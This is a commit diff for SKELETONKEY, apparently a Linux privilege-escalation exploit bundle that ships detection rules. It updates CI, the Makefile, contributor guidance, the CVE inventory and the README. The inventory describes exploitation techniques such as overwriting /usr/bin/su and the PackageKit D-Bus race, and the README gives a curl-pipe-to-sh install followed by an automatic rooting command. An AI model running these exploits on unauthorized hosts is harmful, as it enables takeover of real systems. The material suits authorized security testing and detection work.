release v0.7.0: 22-of-26 VM-verified + --explain + OPSEC + KEV metadata

Bumps SKELETONKEY_VERSION to 0.7.0 and adds docs/RELEASE_NOTES.md with the full v0.7.0 changelog. release.yml updated to use the hand-written notes file as the GitHub Release body (falls back to the auto-generated stub when docs/RELEASE_NOTES.md isn't present, so older tags still publish cleanly). Headline: empirical VM verification across 22 of 26 CVEs, plus the --explain operator briefing mode, OPSEC notes per module, CISA KEV + NVD CWE + MITRE ATT&CK metadata pipeline, 119 detection rules across all 4 SIEM formats, kernel.ubuntu.com mainline kernel fetch path, and the new marketing-grade landing page. Full breakdown in docs/RELEASE_NOTES.md. Tag v0.7.0 next; release workflow auto-builds + publishes the 3 binaries (x86_64 dynamic, x86_64 static-musl via Alpine, arm64 dynamic) with checksums.
README + site + binary: surface 22-of-26 VM-verified count
2026-05-23 20:44:45 -04:00 · 2026-05-23 18:03:38 -04:00 · 2026-05-23 17:35:13 -04:00 · 2026-05-23 16:29:50 -04:00 · 2026-05-23 16:22:10 -04:00 · 2026-05-23 15:46:14 -04:00
94 changed files with 16194 additions and 897 deletions
@@ -22,7 +22,8 @@ jobs:
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y --no-install-recommends \
-            build-essential clang make linux-libc-dev
+            build-essential clang make linux-libc-dev \
+            libglib2.0-dev pkg-config

      - name: show compiler
        run: ${{ matrix.cc }} --version
@@ -54,6 +55,18 @@ jobs:
      - name: sanity — --detect-rules sigma
        run: ./skeletonkey --detect-rules --format=sigma | head -50

+      - name: tests — detect() unit suite
+        env:
+          CC: ${{ matrix.cc }}
+        run: |
+          # Run as a non-root user so modules' "already root" gates do
+          # not short-circuit before the synthetic host-fingerprint
+          # checks fire. The test binary itself is platform-agnostic;
+          # the assertions are #ifdef __linux__ guarded.
+          sudo useradd -m -s /bin/bash skeletonkeyci 2>/dev/null || true
+          sudo chown -R skeletonkeyci .
+          sudo -u skeletonkeyci make test
+
  # Static build job: ensures the project links cleanly when -static is
  # requested. Useful for deployment to minimal containers / fleet scans
  # where shared-libc availability isn't guaranteed.
@@ -66,7 +79,8 @@ jobs:
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y --no-install-recommends \
-            build-essential make linux-libc-dev libc6-dev
+            build-essential make linux-libc-dev libc6-dev \
+            libglib2.0-dev pkg-config
      - name: make static
        # Glibc static linking pulls in NSS at runtime which breaks
        # getpwnam; the legacy DIRTYFAIL Makefile noted this. For now,
@@ -59,8 +59,47 @@ jobs:
            skeletonkey-${{ matrix.target }}
            skeletonkey-${{ matrix.target }}.sha256

+  # Portable static-musl build for x86_64. Runs in Alpine (native
+  # musl + linux-headers) so the resulting binary works on every
+  # libc — glibc 2.x of any version, musl, etc. This is what
+  # install.sh fetches by default (the dynamic binary above hits a
+  # glibc-version ceiling on older distros like Debian 12 / RHEL 8).
+  build-static-x86_64:
+    runs-on: ubuntu-latest
+    name: build (x86_64-static / musl)
+    container:
+      image: alpine:latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: install build deps
+        run: |
+          apk add --no-cache build-base linux-headers tar
+
+      - name: build static (musl)
+        run: |
+          # MSG_COPY is a Linux-only SysV msg flag that glibc defines
+          # but musl does not — netfilter_xtcompat needs it. Define
+          # the kernel constant explicitly. (Kernel: include/uapi/
+          # linux/msg.h: MSG_COPY = 040000)
+          make CFLAGS="-O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -DMSG_COPY=040000" LDFLAGS=-static
+          file skeletonkey
+          ls -la skeletonkey
+
+      - name: rename + checksum
+        run: |
+          mv skeletonkey skeletonkey-x86_64-static
+          sha256sum skeletonkey-x86_64-static > skeletonkey-x86_64-static.sha256
+
+      - uses: actions/upload-artifact@v4
+        with:
+          name: skeletonkey-x86_64-static
+          path: |
+            skeletonkey-x86_64-static
+            skeletonkey-x86_64-static.sha256
+
  release:
-    needs: build
+    needs: [build, build-static-x86_64]
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
@@ -79,31 +118,28 @@ jobs:
        run: |
          tag="${GITHUB_REF#refs/tags/}"
          echo "tag=$tag" >> "$GITHUB_OUTPUT"
-          # Pull the latest entry from CVES.md / ROADMAP.md for the body
-          {
-            echo "## SKELETONKEY $tag"
-            echo
-            echo "Pre-built binaries for x86_64 and arm64. Checksums alongside."
-            echo
-            echo "### Install"
-            echo
-            echo '```bash'
-            echo "curl -sSLfo /tmp/skeletonkey https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/skeletonkey-\$(uname -m | sed s/aarch64/arm64/)"
-            echo "chmod +x /tmp/skeletonkey && sudo mv /tmp/skeletonkey /usr/local/bin/skeletonkey"
-            echo "skeletonkey --version"
-            echo '```'
-            echo
-            echo "Or one-shot via the install script:"
-            echo
-            echo '```bash'
-            echo "curl -sSL https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/install.sh | sh"
-            echo '```'
-            echo
-            echo "### What's in this release"
-            echo
-            echo "See [\`CVES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/CVES.md) for the curated CVE inventory."
-            echo "See [\`ROADMAP.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/ROADMAP.md) for phase progress."
-          } > release-notes.md
+          # Prefer the hand-written release notes if present (richer
+          # per-release context); otherwise fall back to an auto-generated
+          # stub with install instructions + pointers to docs.
+          if [ -f docs/RELEASE_NOTES.md ]; then
+            cp docs/RELEASE_NOTES.md release-notes.md
+          else
+            {
+              echo "## SKELETONKEY $tag"
+              echo
+              echo "Pre-built binaries for x86_64 (dynamic + static-musl) and arm64."
+              echo "Checksums alongside each artifact."
+              echo
+              echo "### Install"
+              echo '```bash'
+              echo "curl -sSL https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/install.sh | sh"
+              echo "skeletonkey --version"
+              echo '```'
+              echo
+              echo "See [\`CVES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/CVES.md) for the CVE inventory."
+              echo "See [\`docs/RELEASE_NOTES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/docs/RELEASE_NOTES.md) for per-release detail."
+            } > release-notes.md
+          fi

      - name: publish release
        uses: softprops/action-gh-release@v2
@@ -114,6 +150,8 @@ jobs:
          files: |
            skeletonkey-x86_64
            skeletonkey-x86_64.sha256
+            skeletonkey-x86_64-static
+            skeletonkey-x86_64-static.sha256
            skeletonkey-arm64
            skeletonkey-arm64.sha256
            install.sh
@@ -6,6 +6,17 @@ build/
 modules/*/build/
 modules/*/dirtyfail
 modules/*/skeletonkey
+/skeletonkey
+/skeletonkey-test
+/skeletonkey-test-kr
+/skeletonkey-x86_64
+/skeletonkey-x86_64-static
+/skeletonkey-x86_64.sha256
+/skeletonkey-x86_64-static.sha256
+/skeletonkey-arm64
+/skeletonkey-arm64.sha256
 .vscode/
 .idea/
 *.swp
+/tools/verify-vm/logs/
+/tools/verify-vm/.vagrant/
@@ -0,0 +1,89 @@
+# Contributing to SKELETONKEY
+
+SKELETONKEY is a curated corpus. PRs welcome for the things below.
+For everything else, open an issue first to discuss scope.
+
+## What we accept
+
+### 1. Kernel offsets for the `--full-chain` table
+
+The 11 🟡 PRIMITIVE modules use the shared finisher in
+`core/finisher.c` to convert their primitive into a root pop via
+`modprobe_path` overwrite. That needs `&modprobe_path` (and friends)
+at runtime — resolved via env vars / `/proc/kallsyms` /
+`/boot/System.map` / the embedded `kernel_table[]` in
+`core/offsets.c`.
+
+The embedded table is **empty by default** to honor the
+no-fabricated-offsets rule. Every entry must come from a real kernel
+you have root on.
+
+**Workflow:**
+
+```bash
+sudo skeletonkey --dump-offsets   # on the target kernel build
+# Paste the printed C struct entry into core/offsets.c kernel_table[]
+# Open a PR titled "offsets: <distro> <kernel_release>"
+```
+
+Include in the PR body:
+- Distro + kernel version (`uname -a`, `cat /etc/os-release`)
+- How you verified the offsets (kallsyms / System.map / debuginfo)
+- Whether `--full-chain` succeeds end-to-end against any 🟡 module
+  on that kernel (if you can test on a vulnerable build)
+
+### 2. New modules
+
+A new CVE module is welcome if:
+
+- The bug is **patched in upstream mainline** (no 0days here)
+- It has a public CVE assignment or clear advisory
+- The kernel range it affects has realistic deployment footprint
+- You can include a working detect() with branch-backport ranges
+- You ship matching detection rules (auditd at minimum)
+
+Use any existing module as a template. Lightest-weight reference:
+`modules/ptrace_traceme_cve_2019_13272/skeletonkey_modules.c`.
+
+Mandatory:
+- Detect short-circuits cleanly on patched kernels (we test this)
+- `--i-know` gate on exploit
+- Honest scope: `SKELETONKEY_EXPLOIT_OK` only after empirical root,
+  otherwise `EXPLOIT_FAIL` with diagnostic
+- `NOTICE.md` crediting the original CVE reporter + PoC author
+
+After the module file exists, wire it into:
+- `core/registry.h` (extern declaration)
+- `skeletonkey.c` main() (register call)
+- `Makefile` (new objects + ALL_OBJS)
+- `CVES.md` (inventory entry)
+
+### 3. Detection rules
+
+If you're adding only detection coverage (no exploit) for an
+existing or new CVE, that's fine. Drop a sigma rule into the module
+or a new auditd rule file.
+
+### 4. Bug reports + CVE-status corrections
+
+Distro backports that patched a CVE without bumping the upstream
+version → file an issue. Same for kernels we mis-classify as
+vulnerable.
+
+## What we don't accept
+
+- Untested code paths claiming `SKELETONKEY_EXPLOIT_OK`
+- Per-kernel offsets fabricated without verification
+- Modules without detection rules
+- 0day disclosures (responsible disclosure first; bundle here
+  after upstream patch ships)
+- Container escapes that don't chain to host root
+
+## Code style
+
+C99. Match the surrounding file. Run `make` and the existing
+CI build (`.github/workflows/build.yml`) before opening the PR.
+
+## License
+
+By contributing you agree your work is MIT-licensed.
@@ -23,7 +23,33 @@ Status legend:
 - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
  historical reference only

-**Counts (v0.3.1):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
+**Counts:** 31 modules total — 28 verified (🟢 14 · 🟡 14) plus 3
+ported-but-unverified (`dirtydecrypt`, `fragnesia`, `pack2theroot` —
+see note below). 🔵 0 · ⚪ 0 planned-with-stub · 🔴 0. (One ⚪ row
+below — CVE-2026-31402 — is a *candidate* with no module, not counted
+as a module.)
+
+> **Note on `dirtydecrypt` / `fragnesia` / `pack2theroot`:** all three
+> are ported from public PoCs. The **exploit bodies** are not yet
+> VM-verified end-to-end, so they're listed 🟡 but excluded from the
+> 28-module verified corpus.
+>
+> All three now have **pinned fix commits and version-based
+> `detect()`**:
+> - `pack2theroot` reads PackageKit's `VersionMajor/Minor/Micro` over
+>   D-Bus and compares against fix release **1.3.5** (commit `76cfb675`).
+> - `dirtydecrypt` uses the `kernel_range` model against mainline fix
+>   **`a2567217`** (Linux 7.0); kernels < 7.0 predate the vulnerable
+>   rxgk code per Debian's tracker.
+> - `fragnesia` uses `kernel_range` against mainline **7.0.9**; older
+>   Debian-stable branches (5.10/6.1/6.12) are still listed vulnerable
+>   on Debian's tracker — backport entries will extend the table as
+>   distros publish them.
+>
+> `--auto` auto-enables active probes (forked per module so a probe
+> crash cannot tear down the scan), which lets all three give an
+> empirical confirmation on top of the version verdict. See each
+> module's `MODULE.md`.

 Every module ships a `NOTICE.md` crediting the original CVE
 reporter and PoC author. `skeletonkey --dump-offsets` populates the
@@ -59,7 +85,13 @@ root on a host can upstream their kernel's offsets via PR.
 | CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
 | CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
 | CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
-| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
+| CVE-2021-3156 | sudo Baron Samedit — `sudoedit -s` heap overflow | LPE (userspace setuid sudo) | sudo 1.9.5p2 (Jan 2021) | `sudo_samedit` | 🟡 | Qualys Baron Samedit. Heap overflow via `sudoedit -s '\'` escaped-backslash parsing. Affects sudo 1.8.2 ≤ V ≤ 1.9.5p1. Heap-tuned exploit — may crash sudo on a mismatched layout. Ships auditd + sigma rules. |
+| CVE-2021-33909 | Sequoia — `seq_file` size_t overflow → kernel stack OOB | LPE (kernel stack OOB write) | mainline 5.13.4 / 5.10.52 / 5.4.134 (Jul 2021) | `sequoia` | 🟡 | Qualys Sequoia. `size_t`-to-`int` conversion in `seq_file` drives an OOB write off the kernel stack via a deeply-nested directory mount. Primitive-only — fires the overflow + records a witness; no portable cred chain. Branch backports: 5.13.4 / 5.10.52 / 5.4.134. Ships auditd rule. |
+| CVE-2023-22809 | sudoedit `EDITOR`/`VISUAL` `--` argv escape | LPE (userspace setuid sudoedit) | sudo 1.9.12p2 (Jan 2023) | `sudoedit_editor` | 🟢 | Structural argv-injection — an extra `--` in `EDITOR`/`VISUAL` makes setuid `sudoedit` open an attacker-chosen file as root. No kernel state, no offsets, no race. Affects sudo 1.8.0 ≤ V < 1.9.12p2. Ships auditd + sigma rules. |
+| CVE-2023-2008 | vmwgfx DRM buffer-object size-validation OOB | LPE (kernel R/W via kmalloc-512 OOB) | mainline 6.3-rc6 (Apr 2023) | `vmwgfx` | 🟡 | vmwgfx DRM `bo` size-validation gap → OOB write in kmalloc-512. Affects 4.0 ≤ K < 6.3-rc6 on hosts with the `vmwgfx` module loaded (VMware guests). Primitive-only — fires the OOB + slab witness; no cred chain. Branch backports: 6.2.10 / 6.1.23. Ships auditd rule. |
+| CVE-2026-31635 | DirtyDecrypt / DirtyCBC — rxgk missing-COW in-place decrypt | LPE (page-cache write into a setuid binary) | mainline Linux 7.0 (commit `a2567217ade970ecc458144b6be469bc015b23e5`) | `dirtydecrypt` | 🟡 | **Ported from the public V12 PoC, exploit body not yet VM-verified.** Sibling of Copy Fail / Dirty Frag in the rxgk (AFS rxrpc encryption) subsystem. `fire()` sliding-window page-cache write, ~256 fires/byte; rewrites the first 120 bytes of `/usr/bin/su` with a setuid-shell ELF. detect() is version-pinned: kernels < 7.0 predate the vulnerable rxgk code (Debian: `<not-affected, vulnerable code not present>` for 5.10/6.1/6.12); kernels ≥ 7.0 have the fix. `--active` probe fires the primitive at a `/tmp` sentinel for empirical override. x86_64. |
+| CVE-2026-46300 | Fragnesia — XFRM ESP-in-TCP `skb_try_coalesce` SHARED_FRAG loss | LPE (page-cache write into a setuid binary) | mainline 7.0.9; older Debian-stable branches still unfixed as of 2026-05-22 | `fragnesia` | 🟡 | **Ported from the public V12 PoC, exploit body not yet VM-verified.** Latent bug exposed by the Dirty Frag fix (`f4c50a4034e6`). AF_ALG GCM keystream table + userns/netns + XFRM ESP-in-TCP splice trigger pair; rewrites the first 192 bytes of `/usr/bin/su`. Needs `CONFIG_INET_ESPINTCP` + unprivileged userns (the in-scope question the old `_stubs/fragnesia_TBD` raised — resolved: ships, reports PRECOND_FAIL when the userns gate is closed). detect() is version-pinned at 7.0.9; older branches that haven't backported yet are flagged VULNERABLE on the version check (override empirically via `--active`). PoC's ANSI TUI dropped in the port. x86_64. |
+| CVE-2026-41651 | Pack2TheRoot — PackageKit `InstallFiles` TOCTOU | LPE (userspace D-Bus daemon → `.deb` postinst as root) | PackageKit 1.3.5 (commit `76cfb675`, 2026-04-22) | `pack2theroot` | 🟡 | **Ported from the public Vozec PoC, not yet VM-verified.** Two back-to-back `InstallFiles` D-Bus calls — first `SIMULATE` (polkit bypass + queues a GLib idle), then immediately `NONE` + malicious `.deb` (overwrites the cached flags before the idle fires). GLib priority ordering makes the overwrite deterministic, not a race. Disclosure by **Deutsche Telekom security**. Affects PackageKit 1.0.2 → 1.3.4 — default-enabled on Ubuntu Desktop, Debian, Fedora, Rocky/RHEL via Cockpit. `detect()` reads `VersionMajor/Minor/Micro` over D-Bus → high-confidence verdict (vs. precondition-only for dirtydecrypt/fragnesia). Debian-family only (PoC's built-in `.deb` builder). Needs `libglib2.0-dev` at build time; Makefile autodetects via `pkg-config gio-2.0` and falls through to a stub when absent. |

 ## Operations supported per module

@@ -91,6 +123,13 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
 | af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
+| sudo_samedit | ✓ | ✓ (primitive) | — (upgrade sudo) | ✓ (crumb nuke) | ✓ (auditd + sigma) |
+| sequoia | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (nested-tree + mount teardown) | ✓ (auditd) |
+| sudoedit_editor | ✓ | ✓ | — (upgrade sudo) | ✓ (revert written file) | ✓ (auditd + sigma) |
+| vmwgfx | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
+| dirtydecrypt | ✓ (+ `--active`) | ✓ (ported) | — (upgrade kernel) | ✓ (evict page cache) | ✓ (auditd + sigma) |
+| fragnesia | ✓ (+ `--active`) | ✓ (ported) | — (upgrade kernel) | ✓ (evict page cache) | ✓ (auditd + sigma) |
+| pack2theroot | ✓ (PK version via D-Bus) | ✓ (ported) | — (upgrade PackageKit ≥ 1.3.5) | ✓ (rm /tmp + `dpkg -r`) | ✓ (auditd + sigma) |

 ## Pipeline for additions

@@ -20,9 +20,15 @@ BUILD   := build
 BIN     := skeletonkey

 # core/
-CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
+CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c \
+             core/host.c core/cve_metadata.c core/verifications.c
 CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))

+# Register-every-module helper. Lives in its own translation unit so
+# the kernel_range unit-test binary can link just CORE_OBJS without
+# pulling in every module symbol via registry_all.o.
+REGISTRY_ALL_OBJ := $(BUILD)/core/registry_all.o
+
 # Family: copy_fail_family
 # All DIRTYFAIL .c files contribute; skeletonkey_modules.c is the bridge.
 CFF_DIR  := modules/copy_fail_family
@@ -126,17 +132,106 @@ NPL_DIR  := modules/nft_payload_cve_2023_0179
 NPL_SRCS := $(NPL_DIR)/skeletonkey_modules.c
 NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))

+SAM_DIR  := modules/sudo_samedit_cve_2021_3156
+SAM_SRCS := $(SAM_DIR)/skeletonkey_modules.c
+SAM_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SAM_SRCS))
+
+SEQ_DIR  := modules/sequoia_cve_2021_33909
+SEQ_SRCS := $(SEQ_DIR)/skeletonkey_modules.c
+SEQ_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SEQ_SRCS))
+
+SUE_DIR  := modules/sudoedit_editor_cve_2023_22809
+SUE_SRCS := $(SUE_DIR)/skeletonkey_modules.c
+SUE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SUE_SRCS))
+
+VMW_DIR  := modules/vmwgfx_cve_2023_2008
+VMW_SRCS := $(VMW_DIR)/skeletonkey_modules.c
+VMW_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(VMW_SRCS))
+
+# Family: dirtydecrypt (CVE-2026-31635) — rxgk page-cache write
+DDC_DIR  := modules/dirtydecrypt_cve_2026_31635
+DDC_SRCS := $(DDC_DIR)/skeletonkey_modules.c
+DDC_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(DDC_SRCS))
+
+# Family: fragnesia (CVE-2026-46300) — XFRM ESP-in-TCP page-cache write
+FGN_DIR  := modules/fragnesia_cve_2026_46300
+FGN_SRCS := $(FGN_DIR)/skeletonkey_modules.c
+FGN_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(FGN_SRCS))
+
+# Family: pack2theroot (CVE-2026-41651) — PackageKit TOCTOU userspace LPE.
+# Needs GLib/GIO for D-Bus; the build autodetects via `pkg-config gio-2.0`.
+# When absent (e.g. no libglib2.0-dev on the build host), the module
+# compiles as a stub that returns PRECOND_FAIL with a hint to install
+# the dev package and rebuild.
+P2TR_DIR  := modules/pack2theroot_cve_2026_41651
+P2TR_SRCS := $(P2TR_DIR)/skeletonkey_modules.c
+P2TR_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(P2TR_SRCS))
+
+P2TR_GIO_OK := $(shell pkg-config --exists gio-2.0 2>/dev/null && echo 1 || echo 0)
+ifeq ($(P2TR_GIO_OK),1)
+  P2TR_CFLAGS := $(shell pkg-config --cflags gio-2.0) -DPACK2TR_HAVE_GIO
+  P2TR_LIBS   := $(shell pkg-config --libs gio-2.0)
+else
+  P2TR_CFLAGS :=
+  P2TR_LIBS   :=
+endif
+
+# Per-object CFLAGS for the pack2theroot translation unit (GLib include
+# paths). Target-specific vars are scoped to this object's recipe.
+$(P2TR_OBJS): CFLAGS += $(P2TR_CFLAGS)
+
 # Top-level dispatcher
 TOP_OBJ  := $(BUILD)/skeletonkey.o

-ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)
+# All module objects in one var so both the main binary and the test
+# binary can re-use the list without duplicating the long enumeration.
+MODULE_OBJS := $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) \
+               $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) \
+               $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) \
+               $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS) \
+               $(SAM_OBJS) $(SEQ_OBJS) $(SUE_OBJS) $(VMW_OBJS) \
+               $(DDC_OBJS) $(FGN_OBJS) $(P2TR_OBJS)

-.PHONY: all clean debug static help
+ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
+
+# Tests — `make test` builds and runs both unit-test binaries.
+#
+#   skeletonkey-test          — detect() integration tests against
+#                                synthetic host fingerprints. Links
+#                                the full module corpus.
+#   skeletonkey-test-kr       — pure unit tests for kernel_range +
+#                                host comparison helpers. Tiny binary
+#                                (core/ only); runs cross-platform.
+TEST_DIR  := tests
+TEST_SRCS := $(TEST_DIR)/test_detect.c
+TEST_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(TEST_SRCS))
+TEST_BIN  := skeletonkey-test
+TEST_ALL_OBJS := $(TEST_OBJS) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
+
+TEST_KR_SRCS := $(TEST_DIR)/test_kernel_range.c
+TEST_KR_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(TEST_KR_SRCS))
+TEST_KR_BIN  := skeletonkey-test-kr
+TEST_KR_ALL_OBJS := $(TEST_KR_OBJS) $(CORE_OBJS)
+
+.PHONY: all clean debug static help test

 all: $(BIN)

 $(BIN): $(ALL_OBJS)
-	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
+
+$(TEST_BIN): $(TEST_ALL_OBJS)
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
+
+$(TEST_KR_BIN): $(TEST_KR_ALL_OBJS)
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
+
+test: $(TEST_BIN) $(TEST_KR_BIN)
+	@echo "[*] running kernel_range unit tests ($(TEST_KR_BIN))"
+	./$(TEST_KR_BIN)
+	@echo
+	@echo "[*] running detect() integration tests ($(TEST_BIN))"
+	./$(TEST_BIN)

 # Generic compile: any .c → corresponding .o under build/
 $(BUILD)/%.o: %.c
@@ -150,13 +245,14 @@ static: LDFLAGS += -static
 static: clean $(BIN)

 clean:
-	rm -rf $(BUILD) $(BIN)
+	rm -rf $(BUILD) $(BIN) $(TEST_BIN) $(TEST_KR_BIN)

 help:
 	@echo "Targets:"
 	@echo "  make           build optimized skeletonkey binary"
 	@echo "  make debug     build with -O0 -g3"
 	@echo "  make static    build a fully static binary"
+	@echo "  make test      build + run the detect() unit test suite"
 	@echo "  make clean     remove build artifacts"
 	@echo ""
 	@echo "Per-module (legacy) — not built by default:"
@@ -1,174 +1,260 @@
 # SKELETONKEY

-> A curated, actively-maintained corpus of Linux kernel LPE exploits —
-> bundled with their detection signatures, patch status, and version
-> ranges. Run it on a system you own (or are authorized to test) and
-> it tells you which historical and recent CVEs that system is still
-> vulnerable to, and — with explicit confirmation — gets you root.
+[![Latest release](https://img.shields.io/github/v/release/KaraZajac/SKELETONKEY?label=release)](https://github.com/KaraZajac/SKELETONKEY/releases/latest)
+[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)
+[![Modules](https://img.shields.io/badge/CVEs-22%20VM--verified%20%2F%2026-brightgreen.svg)](docs/VERIFICATIONS.jsonl)
+[![Platform: Linux](https://img.shields.io/badge/platform-linux-lightgrey.svg)](#)

-```
-       ,d8888b,
-      d88'  `88b
-     d88' ,db, `88b
-     888  d8''8b  888===========================================╗
-     888  88  88  888                                           ║
-     888  `8bd8'  888                                        ╔══╩═╗
-     `88b  `""'  d88'                                        ║    ╠═╗
-      `Y8,      ,8P'                                         ║    ║ ║
-        `"Y8P"'                                              ║    ╠═╝
-                                                             ║    ║
-                                                             ║    ╠═╗
-                                                             ║    ║ ║
-                                                             ║    ╠═╝
-                                                             ╚════╝
+> **One curated binary. 31 Linux LPE modules covering 26 CVEs from 2016 → 2026.
+> 22 confirmed end-to-end against real Linux VMs via `tools/verify-vm/`.
+> Detection rules in the box. One command picks the safest one and runs it.**

-                       S K E L E T O N K E Y
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+  && skeletonkey --auto --i-know
 ```

-> ⚠️ **Authorized testing only.** SKELETONKEY is a research and red-team
-> tool. By using it you assert you have explicit authorization to test
-> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
+> ⚠️ **Authorized testing only.** SKELETONKEY runs real exploits. By
+> using it you assert you have explicit authorization to test the
+> target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
+
+## Why use this
+
+Most Linux privesc tooling is broken in one of three ways:
+
+- **`linux-exploit-suggester` / `linpeas`** — tell you what *might*
+  work, run nothing
+- **`auto-root-exploit` / `kernelpop`** — bundle exploits but ship
+  no detection signatures and went stale years ago
+- **Per-CVE PoC repos** — one author, one distro, abandoned within
+  months
+
+SKELETONKEY is one binary, actively maintained, with detection rules
+for every CVE in the bundle — same project for red and blue teams.
+
+## Who it's for
+
+| Audience | What you get |
+|---|---|
+| **Red team / pentesters** | One tested binary. `--auto` ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. |
+| **Sysadmins** | `skeletonkey --scan` (no sudo needed) tells you which boxes still need patching. Fleet-scan tool included. JSON output for CI gates ([schema](docs/JSON_SCHEMA.md)). |
+| **Blue team / SOC** | Auditd + sigma + yara + falco rules for every CVE. `--detect-rules --format=auditd \| sudo tee …` ships SIEM coverage in one command. |
+| **CTF / training** | Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. |
+
+## Corpus at a glance
+
+**31 modules covering 26 distinct CVEs** across the 2016 → 2026 LPE
+timeline. **22 of the 26 CVEs have been empirically verified** in real
+Linux VMs via `tools/verify-vm/`; the 4 still-pending entries are
+blocked by their target environment, not by missing code.
+
+| Tier | Count | What it means |
+|---|---|---|
+| 🟢 Full chain | **14** | Lands root (or its canonical capability) end-to-end. No per-kernel offsets needed. |
+| 🟡 Primitive | **14** | Fires the kernel primitive + grooms the slab + records a witness. Default returns `EXPLOIT_FAIL` honestly. Pass `--full-chain` to engage the shared `modprobe_path` finisher (needs offsets — see [`docs/OFFSETS.md`](docs/OFFSETS.md)). |
+
+**🟢 Modules that land root on a vulnerable host:**
